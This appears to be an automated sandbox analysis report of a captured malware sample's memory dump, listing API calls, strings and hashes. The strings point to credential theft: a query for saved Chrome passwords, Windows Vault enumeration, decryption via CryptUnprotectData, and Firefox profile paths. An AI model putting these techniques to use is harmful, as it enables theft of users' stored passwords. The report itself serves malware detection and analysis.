                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                              • Instruction ID: df14504fdc59ccf6a8c55cbe4aacceea24f9204784c5926a31105bf4aba29bc2
                                                              • Opcode Fuzzy Hash: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                              • Instruction Fuzzy Hash: 8E018478D40314BBEB119F71AC09B563EA9F7187967180977F41862272DBB98810EE8C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040BED5
                                                              • memset.MSVCRT ref: 0040BEFF
                                                              • memset.MSVCRT ref: 0040BF15
                                                              • memset.MSVCRT ref: 0040BF2B
                                                              • _snwprintf.MSVCRT ref: 0040BF64
                                                              • wcscpy.MSVCRT ref: 0040BFAF
                                                              • _snwprintf.MSVCRT ref: 0040C03C
                                                              • wcscat.MSVCRT ref: 0040C06E
                                                                • Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3
                                                              • wcscpy.MSVCRT ref: 0040C050
                                                              • _snwprintf.MSVCRT ref: 0040C0AD
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1277802453-601624466
                                                              • Opcode ID: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                              • Instruction ID: c023c2c05774347514c90e9c4a79a5fc261e79551634f2018d74b142c4ca0a41
                                                              • Opcode Fuzzy Hash: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                              • Instruction Fuzzy Hash: 6B619E31900208EFEF14EF94CC86EAEBB79EF44314F50419AF905AA1D2DB75AA51CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                              • Instruction ID: df620ac0873104ba588d68bc57a3bc16e82c0a505241d1212890b0a23309d9f4
                                                              • Opcode Fuzzy Hash: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                              • Instruction Fuzzy Hash: 03418371D402197AEB20EB55DD41EFB727CFF04304F4401AAB509E2181EB749B948F6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
                                                                • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
                                                                • Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                                • Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                                • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                                • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                                • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                                • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                                • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                                • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                                • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
                                                                • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                                • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
                                                                • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                                • Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035FF
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403614
                                                              • LoadIconW.USER32(00000000,00000074), ref: 00403619
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403628
                                                              • LoadIconW.USER32(00000000,00000073), ref: 0040362D
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
                                                              • LoadIconW.USER32(00000000,00000075), ref: 00403641
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403650
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403655
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403664
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403669
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 792915304-0
                                                              • Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                              • Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
                                                              • Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                              • Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                                • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                              • free.MSVCRT(00000000), ref: 00408F8C
                                                                • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                              • memset.MSVCRT ref: 00408E72
                                                                • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                                • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                              • wcschr.MSVCRT ref: 00408EAA
                                                              • memcpy.MSVCRT ref: 00408EDE
                                                              • memcpy.MSVCRT ref: 00408EF9
                                                              • memcpy.MSVCRT ref: 00408F14
                                                              • memcpy.MSVCRT ref: 00408F2F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: 304b7aa682d0d5287a8fa6b73ca6f68e73075feab4bd72610b676fe8e1ac988e
                                                              • Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
                                                              • Opcode Fuzzy Hash: 304b7aa682d0d5287a8fa6b73ca6f68e73075feab4bd72610b676fe8e1ac988e
                                                              • Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                              • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                              • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                              • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                              • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                              • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                              • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                              • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                              • API String ID: 2238633743-2107673790
                                                              • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                              • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                              • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                              • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407144: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                              • GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00406BDC
                                                                • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                              • memset.MSVCRT ref: 00406C0B
                                                              • memset.MSVCRT ref: 00406C2B
                                                              • memset.MSVCRT ref: 00406C40
                                                              • strcmp.MSVCRT ref: 00406C64
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406DC3
                                                              • CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                                              • String ID: ---$Rp@
                                                              • API String ID: 2784192885-2834202798
                                                              • Opcode ID: 614e551d5795541160b5de4d8961335091f427078502da2becb97fdac2c5e3dd
                                                              • Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
                                                              • Opcode Fuzzy Hash: 614e551d5795541160b5de4d8961335091f427078502da2becb97fdac2c5e3dd
                                                              • Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
                                                                • Part of subcall function 00408836: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                                • Part of subcall function 00408836: CloseHandle.KERNEL32(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                                • Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                                • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                              • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                              • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                              • DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                                • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                                • Part of subcall function 0040715D: CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                              • WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                              • CloseHandle.KERNEL32(?), ref: 00408C30
                                                              • CloseHandle.KERNEL32(?), ref: 00408C35
                                                              • CloseHandle.KERNEL32(00000000), ref: 00408C3A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00408C3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateMappingNameOpenPathSizeUnmapWindowsWritememset
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                              • API String ID: 4205445468-4002013007
                                                              • Opcode ID: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                              • Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
                                                              • Opcode Fuzzy Hash: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                              • Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040AA6A
                                                              • memset.MSVCRT ref: 0040AA86
                                                                • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                • Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                                • Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                                • Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                                • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                                • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                                • Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
                                                                • Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0
                                                              • wcscpy.MSVCRT ref: 0040AACA
                                                              • wcscpy.MSVCRT ref: 0040AAD9
                                                              • wcscpy.MSVCRT ref: 0040AAE9
                                                              • EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
                                                              • EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
                                                              • wcscpy.MSVCRT ref: 0040AB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3037099051-517860148
                                                              • Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                              • Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
                                                              • Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                              • Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                              • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                              • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                              • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                              • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                              • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                              • API String ID: 2238633743-1621422469
                                                              • Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                              • Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
                                                              • Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                              • Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00410DED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-70141382
                                                              • Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                              • Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
                                                              • Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                              • Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040286E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
                                                              • CloseHandle.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
                                                              • memset.MSVCRT ref: 004028C7
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A
                                                                • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                              • memset.MSVCRT ref: 0040293C
                                                                • Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
                                                                • Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C
                                                                • Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07
                                                                • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                              • memset.MSVCRT ref: 00402A95
                                                              • memcpy.MSVCRT ref: 00402AA8
                                                              • LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2
                                                              Strings
                                                              • chp, xrefs: 0040288D
                                                              • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteCharCloseCopyCreateDeleteDirectoryHandleLoadMultiNamePathProcSystemWideWindowsmemcpy
                                                              • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                              • API String ID: 3056168783-1844170479
                                                              • Opcode ID: bdc0de79ca2284851d58d070651b9c31a95aeb0c77c9c6dd0d100bb5bcb2011a
                                                              • Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
                                                              • Opcode Fuzzy Hash: bdc0de79ca2284851d58d070651b9c31a95aeb0c77c9c6dd0d100bb5bcb2011a
                                                              • Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$wcslen$wcscpy$Closewcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 3473048249-2068335096
                                                              • Opcode ID: 3e543d6ef787c3e942a00b67b4f0d7ff26aed4b195ac4f4c03f6ff09ccfd02d6
                                                              • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                              • Opcode Fuzzy Hash: 3e543d6ef787c3e942a00b67b4f0d7ff26aed4b195ac4f4c03f6ff09ccfd02d6
                                                              • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$wcslen$wcscpy$Closewcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 3473048249-3369679110
                                                              • Opcode ID: 1245aa232f47dc0ed27cff338fad7f5be1c9f25a1fba4b63a91384b5d043fe61
                                                              • Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
                                                              • Opcode Fuzzy Hash: 1245aa232f47dc0ed27cff338fad7f5be1c9f25a1fba4b63a91384b5d043fe61
                                                              • Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                              • Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
                                                              • Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
